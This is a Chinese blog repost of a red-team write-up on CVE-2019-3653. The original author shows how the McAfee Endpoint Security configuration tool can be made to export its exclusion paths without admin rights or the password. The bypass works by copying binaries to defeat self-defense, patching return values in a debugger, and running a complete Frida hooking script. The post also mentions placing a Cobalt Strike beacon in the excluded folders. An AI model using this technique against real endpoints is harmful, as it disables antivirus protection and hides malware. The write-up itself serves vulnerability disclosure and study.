1. 展天博客首页
  2. 投稿

怎样卸载迈克菲,如何禁用mcafee杀毒软件

投稿

利用Mcafee管理工具绕过McAfee杀毒软件

介绍这篇文章是关于我在一次红队活动中如何利用McAfee工具绕过McAfee Endpoint Security杀毒软件的故事。本来我没有计划写这篇文章,但当时的队友@fsdominguezand和@_dirkjan觉得此事值得被记录下来。现在,就让我们开始吧。McAfee在以往,每当我们遇到McAfee Virus Scan Enterprise(VSE)的时候,都可以通过简单地查询注册表,了解到那些位置是管理员指定的“特殊位置”(不受杀毒软件影响)。

然而,在这次任务中,事情没那么简单。因为他们使用的是McAfee Endpoint Security,从VSE时代到现在,McAfee可能认为最好不要将“特殊位置”之类的信息以明文形式存储在任何人都可阅读的文件中。

那么,我们现在该把恶意文件放在哪里?ESConfigToolMcAfee Endpoint Security杀毒软件附带一个名为ESConfigTool的程序,可用于导入和导出配置文件。它的详细用法如下。

我们发现,要从McAfee Endpoint Security得知安全设置,你需要:解锁密码管理权限很遗憾这两者我们都没有。

现在,先让我们下载一个试用版本的McAfee Endpoint Security,看看是否有入手点。

变化我们最后决定还是以ESConfigTool为目标,看看它是否有漏洞。我先创建了三个“特殊位置”:C:\Windows\Temp\*mimikatz.exeC:\TotallyLegit\

还设置了密码保护:starwars。

打开一个cmd,看看我们是否可以得到这些设置信息。

Microsoft Windows [Version 10.0.16299.15](c) 2017 Microsoft Corporation. All rights reserved.C:\Windows\system32>”C:\Program Files\McAfee\Endpoint Security\Endpoint Security Platform\ESConfigTool.exe” /export C:\Export.xml /module TP /unlock starwars /plaintextCommand executed successfully. Please refer to Endpoint Security logs for detailsC:\Windows\system32>让我们打开xml文件,看看是否有敏感信息:

C:\Windows\Temp\031110**\*mimikatz.exe030110C:\TotallyLegit\031110是的,在拥有管理员权限以及输入了正确密码的情况下,你可以得到安全设置。让我们通过x64dbg软件,看一下它的整体流程。Self-defense通常使用调试软件打开二进制文件是很简单的,但由于我们面对的是安全软件,所以有一些额外的障碍。一个重要的原因是,McAfee的大部分组件都有“自卫”功能。如果你尝试使用调试软件,将立即得到一个Debugging stopped消息,McAfee对这种可疑行为极为敏感。

 

12/10/2019 12:47:09 mfeesp(2204.6392) ApBl.SP.Activity: DESKTOP-DNUK2R5\admin ran X64DBG.EXE, which attempted to access ESCONFIGTOOL.EXE, violating the rule “Core Protection – Protect McAfee processes from unauthorized access and termination”, and was blocked. For information about how to respond to this event, see KB85494.12/10/2019 12:47:09 mfeesp(2204.5404) ApBl.SP.Activity: DESKTOP-DNUK2R5\admin ran X64DBG.EXE, which attempted to access ESCONFIGTOOL.EXE, violating the rule “Core Protection – Protect McAfee processes from unauthorized access and termination”, and was blocked. For information about how to respond to this event, see KB85494.看来我们首先需要绕过这种自我防御机制。

Microsoft Windows [Version 10.0.16299.15](c) 2017 Microsoft Corporation. All rights reserved.C:\Users\admin>mkdir \tempC:\Users\admin>cd \tempC:\temp>copy “C:\Program Files\McAfee\Endpoint Security\Endpoint Security Platform\ESConfigTool.exe” . 1 file(s) copied.C:\temp>copy “C:\Program Files\McAfee\Endpoint Security\Endpoint Security Platform\blframework.dll” . 1 file(s) copied.C:\temp>copy “C:\Program Files\McAfee\Endpoint Security\Endpoint Security Platform\EpSecApiLib.dll” . 1 file(s) copied.C:\temp>copy “C:\Program Files\McAfee\Endpoint Security\Endpoint Security Platform\McVariantExport.dll” . 1 file(s) copied.C:\temp>copy “C:\Program Files\McAfee\Endpoint Security\Endpoint Security Platform\LogLib.dll” . 1 file(s) copied.C:\temp>没错,只要像如上所述疯狂复制文件,你就可以绕过自我防御,对软件进行调试。现在,让我们开始调试吧

绕过密码检查先让我们看看当使用错误的密码时会发生什么,也许会有一些字符提示:

C:\Windows\system32>”C:\Program Files\McAfee\Endpoint Security\Endpoint Security Platform\ESConfigTool.exe” /export C:\Export.xml /module TP /unlock startrek /plaintextThere were some errors while executing command. Please refer to Endpoint Security logs for detailsC:\Windows\system32>嗯,没什么特别的。不过McAfee的日志文件提供了更多信息:

10/12/2019 01:11:46.400 PM ESConfigTool(5476.8840) ESConfigTool.ESConfigTool.Error (ImportExportUtil.cpp:677): Failed to unlock client settings with user supplied password, TriggerAction failed让我们在调试器中搜索特定字符串,看看能否找到这个错误的来源。

 

现在我们把这个位置设为断点,再运行一次,看看在断点之前发生了什么。我们可以看到一个函数调用了一个名为BLInvokeMethod的东西,后面还跟着一个没有执行的跳转:

 

此时,我们有两个选择:进入密码检查函数,看看它是如何工作的,并尝试破解密码。直接更改检查函数的返回值。因为我很懒,我所以选择了第2项。当输入错误的密码时,密码检查函数会将错误代码放入RAX寄存器:

如果提供了正确的密码,则RAX寄存器的值为0

那么,如果我们提供了错误的密码,将密码检查函数中断,并将RAX寄存器的值改为0,会发生什么情况呢?

成功导出设置!

看来密码检查只是由工具本身完成的,不牵涉其他组件,也不需要解密。绕过管理员权限在没有管理员权限的情况下,ESConfigTool工具能使用的功能是非常有限的:

Microsoft Windows [Version 10.0.16299.15](c) 2017 Microsoft Corporation. All rights reserved.C:\Users\user>”C:\Program Files\McAfee\Endpoint Security\Endpoint Security Platform\ESConfigTool.exe” /export C:\temp\Export.xml /module TP /unlock starwars /plaintextDescription: Endpoint security configuration tool for exporting and importing policy configuration. User needs administrator privileges to run this utility. Utility needs password if the client interface is password protected. File supplied for import must be an encrypted file.USAGE: ESConfigTool.exe /export [/module <TP|FW|WC|ESP> ] [/unlock ] [/plaintext ] ESConfigTool.exe /import [/module <TP|FW|WC|ESP> ] [/unlock ] [/policyname ] ESConfigTool.exe /helpC:\Users\user>我们怎样才能知道权限检查的流程呢?先让我们以普通用户的身份运行调试器,看看会发生什么。发现它调用一个函数,并对返回值进行字符串比较,如果返回代码不是0,则调用“exit”。

如果追踪这个函数,会发现它将最终调用AllocateAndInitializeSid。不过这些都不值得花时间去逆向。让我们再次尝试偷懒的方法更改函数返回值。

返回值检查如下:

这一次返回值必须是0以外的任何值。

OK,又成功了!

我们现在可以从McAfee Endpoint Security导出安全设置,不需要管理权限,不需要知道正确的密码!自动运行到目前为止,一切都很顺利,但是每次使用调试器更改返回值是一件痛苦的事情。不过幸运的是,存在Frida这么一个有趣的东西,它可以帮你做所有很酷的事情,比如hook函数或改变其返回值,你不需要任何额外的技能,除了javascript!

那么我们如何将Frida注入到McAfee呢?很简单,frida-server。只需在运行McAfee的机器上启动它,然后使用Python进行连接。McAfee机器:Microsoft Windows [Version 10.0.16299.15](c) 2017 Microsoft Corporation. All rights reserved.C:\Users\admin>cd \tempC:\temp>frida-server-12.7.9-windows-x86_64.exePython机器:Python 3.6.7 (default, Oct 22 2018, 11:32:17) [GCC 8.2.0] on linuxType “help”, “copyright”, “credits” or “license” for more information.>>> import frida>>> devmgr = frida.get_device_manager()>>> devmgr.add_remote_device(‘192.168.31.150′)Device(id=”tcp@192.168.31.150″, name=”192.168.31.150″, type=’remote’)>>> rdev = frida.get_device(‘tcp@192.168.31.150’)>>> args = [… ‘ESConfigTool.exe’,… ‘/export’,… ‘frida-export.xml’,… ‘/module’,… ‘ESP’,… ‘/unlock’,… ‘startrek’,… ‘/plaintext’… ]>>> pid = rdev.spawn(args)>>> session = rdev.attach(pid)>>> sessionSession(pid=11168)现在我们已经连接上,ESConfigTool.exe也正在运行!

现在我们可以将JS代码注入到ESConfigTool进程中。Frida脚本我不会详细介绍这个脚本的功能,其完整代码如下:

const configbase = Module.findbaseAddress(‘ESConfigTool.exe’);//const adminCheck = configbase.add(0x5240); //32const adminCheck = configbase.add(0x5f30); //64const BLInvokeMethod = Module.findExportByName(‘blframework.dll’,’BLInvokeMethod’)console.log(‘[-] base address is:’,configbase);console.log(‘[-] Admin check is:’,adminCheck);console.log(‘[-] BLInvokeMethod:’,BLInvokeMethod);Interceptor.attach(adminCheck, { onEnter: function (args) { console.log(‘[+] Hooked admin check function’); }, onLeave: function (retval) { console.log(‘[+] Returning true for admin check’); retval.replace(1); }});Interceptor.attach(BLInvokeMethod, { onEnter: function (args) { console.log(‘[+] Hooked BLInvokeMethod function’); }, onLeave: function (retval) { console.log(‘[+] Patching password check function’); retval.replace(0x0); }});这个脚本执行的正是我们在调试器中手动执行的操作,更改返回值。让我们注入脚本,看看它是否有效:

>>> script = “””… const configbase = Module.findbaseAddress(‘ESConfigTool.exe’);… //const adminCheck = configbase.add(0x5240); //32… const adminCheck = configbase.add(0x5f30); //64… const BLInvokeMethod = Module.findExportByName(‘blframework.dll’,’BLInvokeMethod’)… … console.log(‘[-] base address is:’,configbase);… console.log(‘[-] Admin check is:’,adminCheck);… console.log(‘[-] BLInvokeMethod:’,BLInvokeMethod);… … Interceptor.attach(adminCheck, {… onEnter: function (args) {… console.log(‘[+] Hooked admin check function’);… },… onLeave: function (retval) {… console.log(‘[+] Returning true for admin check’);… retval.replace(1);… }… });… … Interceptor.attach(BLInvokeMethod, {… onEnter: function (args) {… console.log(‘[+] Hooked BLInvokeMethod function’);… },… onLeave: function (retval) {… console.log(‘[+] Patching password check function’);… retval.replace(0x0);… }… });… … “””>>> session.create_script(script).load()[-] base address is: 0x7ff73ed30000[-] Admin check is: 0x7ff73ed35f30[-] BLInvokeMethod: 0x7ffa4d759730>>> rdev.resume(pid)>>> [+] Hooked admin check function[+] Returning true for admin check[+] Hooked BLInvokeMethod function[+] Patching password check function>>>最终结果如下:

虽然我是作为“admin”用户运行的,但是没有涉及UAC。相信我,这套方法也适用于普通用户。后续现在,我们就可以把一个Cobalt Strike beacon放入那些“特殊位置”。尽管在本文中只讨论了设置信息导出,但你也可以导入配置文件,添加“特殊位置”,更改其他设置,甚至完全删除密码。

值得一提的是,其实这个配置文件加密与否并不重要,因为你可以把它导入自己的McAfee软件进行查看。

McAfee在确认了漏洞后,发布了一个安全建议和相关的修复程序,漏洞被标记为CVE-2019-3653。

如果你想了解更多,可以在这里找到PoC脚本。

本文由白帽汇整理并翻译,不代表白帽汇任何观点和立场

来源:https://dmaasland.github.io/posts/mcafee.html

原文:https://www.loosebyte.com/google-cloud-vulnerability/

白帽汇从事信息安全,专注于安全大数据、企业威胁情报。

公司产品:FOFA-网络空间安全搜索引擎、FOEYE-网络空间检索系统、NOSEC-安全讯息平台。

为您提供:网络空间测绘、企业资产收集、企业威胁情报、应急响应服务。

本文来自投稿,不代表展天博客立场,如若转载,请注明出处:https://www.me900.com/326069.html

(0)
0

相关推荐

  • 邓肯笑吃t(邓肯笑吃t视频)

    北京时间12月3日,湖人客场挑战掘金,最终湖人以100比115不敌掘金,遭遇四连败。此役,球哥出战33分钟,仅仅拿到9分9篮板5助攻的数据,可谓是相当低迷。而在最后时刻,面对掘金小将穆雷“人球分过”这一极为挑衅性的行为,球哥的毫无反应更是被球迷们骂为软蛋! 当然,在这里老三对以上行为不做分析,毕竟,可能当时的球哥真的没有看到,因为根据当时的录像回放,球哥明显…

    2022-01-20 投稿

  • 学口腔医学的好处和坏处(口腔医学的优势是什么)

    口腔医学的5条出路,学生不仅能当牙医,还能当口腔科医生 每年都有百万医学生流向社会,能真正做医生的很少,而其中能当口腔科医生的更少。按相关数据表示,一线大城市尚且有3万的口腔科医生的缺口,而普通二线三线大城市缺口会更多。所以说学生想学医,可以把目光从临床医学上挪到口腔医学上。本期袁老师就为口腔医学的学生,系统地总结了五条出路,建议收藏。   出路一…

    2021-12-25 投稿
  • 2022年哪个星座财运好,2022财运星座大全 投稿

    2022年哪个星座财运好,2022财运星座大全

    来源第一星座 每个人的一生中都会面对多多少少、大大小小的好运,但很难能够真正的利用好自己的运势,甚至很多时候都是没有办法获得自己的好运,而有些聪明的人即便是遇到水逆也能将其转化为好运,做到好运加倍,那么在明年,哪些星座能够获得这份好运呢? 双鱼座 双鱼座在明年的财运非常好,这一份来之不易的好运让双鱼座在明年风生水起,他们什么事都不用做,天上就会掉馅饼,如果要…

    2022-04-30

  • 下堂妻的悠哉日子(穿成首辅的炮灰前妻全文阅读)

    小桃惊呼一声,不可置信的站在原地,主子有多喜欢王爷,她可是看的清清楚楚,如今王爷竟然要休了主子?而且,主子还这么淡然,想当初主子为了嫁王爷可是连名声都不要了的。 “怎么?”容离回头看着小桃,小丫头怎么这么吃惊。 “主子,您…”小桃眼圈都有些红了,主子肯定受了莫大的委屈,才像如今这般转了心性,小桃的心仿佛被揪了起来,她从小和主子一起长大,俩人虽是主仆,其实主子…

    投稿 2023-05-24
  • 网络营销的方式和方法分析(网络营销的主要方式和技巧) 投稿

    网络营销的方式和方法分析(网络营销的主要方式和技巧)

    随着互联网的发展,很多传统商家都开始转型线上,而传统的线下贸易与网络营销在经营模式上还是有一定的不同之处,套用旧有的经验是行不通的。所以今天我就来给大家分享进行网络营销的7大技巧,助你玩转线上经济! 技能1:SEO(Search Engine Optimization) SEO,是Search Engine Optimization的缩写,中文是搜索引擎优化…

    2022-03-12

  • 临沂光伏发电项目概念性规划设计文本编写要求

    在临沂客户端12月28日讯 记者从临沂市“四减四增”工作情况新闻发布会上获悉,在上一轮“四减四增”行动中,临沂高度重视新能源发展,取得了明显成效。 一是扩大新能源和可再生能源装机容量。新能源及可再生能源发电装机406.77万千瓦,占全市装机41%,光伏、风、生物质、水电分别装机257.1、99.98、45.1、4.59万千瓦,均位居全省前列,2020年发电5…

    投稿 2022-04-24

  • 马季和侯宝林是什么关系?谁辈分高

    相声界子承父业的非常多,比如尹笑声、马志明、李伯祥、侯耀文、师胜杰、王文林、杨议、杨威、赵伟洲、谢金以及郭麒麟等,但马东却是个例外。   1 马东是马季的儿子。马东自言自己不是说相声的料,可四岁半时他就能说快板书《奇袭白虎团》,但不是马季教的,而是跟着收音机里学的。2009年,马东在央视春晚的舞台上跟刘伟、郑健、周炜等合说群口相声《新五官争功》,无…

    2022-04-29 投稿
  • 抖音1w粉丝一个月能赚多少钱?抖音最简单的赚钱方式 投稿

    抖音1w粉丝一个月能赚多少钱?抖音最简单的赚钱方式

    真的。还有赚的更多的。但要看你会不会运作。 其实抖音平台之所以那么多的用户,那么大的流量,就是因为有人能够在这里得到收益。没好处的事情谁会干呢,对吧?所以不要小看每一个主播,就连一个没什么粉丝没什么评论的主播,他的流量都可能是每天一千多块的,更别说那些大主播了。 之前我朋友就给我发了个她在抖音上的截图,说是一个女主播,平时也不开直播,就发发短视频,拍的都是自…

    2023-02-12

  • 暮光之眼天赋 什么是暮光之眼天赋

    本文摘要:慎是一个很全面型的上单选手,有控制有护盾还兼全球支援,Q技能还有回复骚扰,在团战中也不容易死掉,尤其在开黑时利用慎可以打出全图支援 四一分推战术,团战中的贡献值很高。 暮光之眼英雄浅析 暮光之眼的优点 慎是抗压性的坦克上单,他拥有很强骚扰能力的Q技能,增加护盾抗伤害的W技能,范围嘲讽的E技能,还型有全图流大招R技能,慎的线上能力并不强,但抗压能力十…

    投稿 2023-06-05

  • 骁龙695是什么水平,骁龙695能带动什么游戏

    近些年的移动消费电子市场越来越卷,千元机的性能已经可以满足日常的使用。前几天刚刚发布的OPPO A1搭载了骁龙695,属于千元机中的常客了,那么OPPO A1的表现到底怎么样呢?下面为大家做了详细的性能测试,结果行不行读者朋友们说了算。   1骁龙695,够用好用 骁龙695由6nm制程工艺打造,拥有两个2.2GHz A78大核,六个1.8GHz …

    2023-07-12 投稿

  • 医用护膝比较好的品牌,理疗护膝哪个牌子好

    很多喜欢运动的人群都知道应该在运动中对自己的膝关节进行保护,但是对于市面上各种各样的护膝很多人都觉得很迷惑,不知道到底哪种适合自己的关节;很多骨关节炎的患者虽然知道使用护膝,但是有一些患者常年的佩戴护膝,这也是不对的。今天谢医生就给大家讲解一下关于护膝的相关知识。 护膝到底有没有用?护膝的作用主要是体现在保暖以及稳定关节两方面。 一、保暖。很多人的关节因为容…

    2023-07-10 投稿

  • 天然维生素b13,b13维生素的作用及功能主治

    葡萄牙伟大的航海家麦哲伦为开辟新航线,率领有5艘船组成远洋船队,开始从南美洲东岸出发的“探险航行”。   船队航行三个月后,船员们陆续开始牙床破裂和流鼻血。待船到达目的地时,原来的200多人,活下来的幸存者只有35人。麦哲伦因为卷入与菲律宾当地土著人的纠纷不幸中箭而亡,最后只剩下一艘船和十几名船员,于1522年9月6日成功回到西班牙,历时1082天…

    2023-07-09 投稿